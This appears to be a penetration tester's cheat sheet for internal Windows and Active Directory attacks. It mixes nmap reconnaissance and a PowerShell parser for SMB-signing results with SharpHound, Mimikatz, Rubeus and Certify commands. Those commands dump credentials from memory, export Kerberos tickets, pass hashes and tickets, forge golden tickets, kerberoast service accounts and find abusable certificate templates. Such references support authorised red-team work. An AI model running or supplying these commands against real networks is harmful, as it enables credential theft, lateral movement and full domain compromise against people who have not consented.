Internal (Windows)
Starting with some Nmap scans and scripts, we can gather plenty of information for more targeted attacks and for finding other attack paths and vectors. If we were given user credentials for a "compromised user" approach, further paths open up, but either way we want to run all of these checks both with and without credentials.
We should also verify whether the machine is domain joined.
NMap
Find up hosts (greppable output, keep only the IP of each line whose status is Up):
nmap -sn -iL targets.txt -oG - | ForEach-Object { if ($_ -match "Up$") { ($_ -split ' ')[1] } } > uphosts.txt
Scan and output to file:
nmap -p 80 --open -iL targets.txt > 80.txt
SMB signing not required (the script reports "Message signing enabled but not required" for hosts that do not enforce signing; the output file still contains every scanned host):
nmap -p 445 -iL uphosts.txt --script smb2-security-mode.nse > smb-signing-not-required.txt
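To reduce the scan output above to only the hosts that do not enforce SMB signing, here is an added PowerShell example (not part of the original page); the embedded nmap output is constructed to mirror the script's real wording, and the function name is our own:

```powershell
# Added example: filter nmap normal output from the smb2-security-mode script
# down to hosts whose SMB signing is not enforced. The sample below is
# constructed; in practice feed it Get-Content smb-signing-not-required.txt.
$sample = @'
Nmap scan report for 10.0.0.5
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.0.0.6
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
'@

function Get-SmbSigningNotRequired {
    param([string[]]$Lines)
    $current = $null
    foreach ($line in $Lines) {
        # Each host block starts with this header; remember the host/IP.
        if ($line -match '^Nmap scan report for (?<host>\S+)') {
            $current = $Matches['host']
        }
        # Report hosts where signing is optional or disabled; skip "enabled and required".
        elseif ($current -and $line -match 'Message signing (enabled but not required|disabled)') {
            [pscustomobject]@{ Host = $current; Signing = $Matches[1] }
            $current = $null   # one finding per host block
        }
    }
}

# Usage with the constructed sample; prints 10.0.0.5 only.
Get-SmbSigningNotRequired -Lines ($sample -split "`r?`n")
```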
SNMP info:
nmap -Pn -sV -p 161 --script=snmp-info IP
Extract the IP addresses from saved output into a list:
Select-String -Path "input.txt" -Pattern '\b(?:\d{1,3}\.){3}\d{1,3}\b' | ForEach-Object { $_.Matches.Value } > output.txt
Sharphound
Collect ingest files for BloodHound:
Sharphound.exe -u USER -p 'PASSWORD' -d DOMAIN -c All
Mimikatz
Enable debug privileges
privilege::debug
sekurlsa
Extract credentials from the system's memory
sekurlsa::logonpasswords
sekurlsa::logonPasswords full
Dump and export Kerberos tickets from memory
sekurlsa::tickets /export
Pass the hash - PTH
sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:HASH /run:cmd
kerberos
Dump and export Kerberos tickets from memory associated with active user sessions
kerberos::list /export
Pass the ticket - PTT
kerberos::ptt c:\TICKET
Create a Golden Ticket (/sid is the domain SID, /krbtgt the krbtgt account hash, /ticket the output file):
kerberos::golden /admin:DOMAIN-ADMIN /domain:DOMAIN /sid:DOMAIN-SID /krbtgt:KRBTGT-HASH /ticket:TICKET
TGT
Interact with and manipulate Kerberos tickets
kerberos
ekeys
Dump encryption keys from the system's memory
sekurlsa::ekeys
DPAPI
Extract and decrypt credentials protected by DPAPI (Data Protection API) from memory
sekurlsa::dpapi
Rubeus
Verify we can obtain a valid Kerberos ticket
.\Rubeus.exe asktgt /user:USER /password:PASSWORD
Dump all Kerberos tickets currently in memory for the logged-in user
.\Rubeus.exe dump
Export the dumped tickets to .kirbi files:
.\Rubeus.exe dump /export
Request a service ticket (TGS) for a specific service using an existing TGT:
.\Rubeus.exe asktgs /ticket:BASE-64-TICKET
Request service tickets for SPNs (Service Principal Names) associated with service accounts
.\Rubeus.exe kerberoast
List the Kerberos tickets cached for the current logon session (built-in Windows command):
klist
Certify
Find all enabled certificate templates
.\Certify.exe find
Find vulnerable/abusable certificate templates
.\Certify.exe find /vulnerable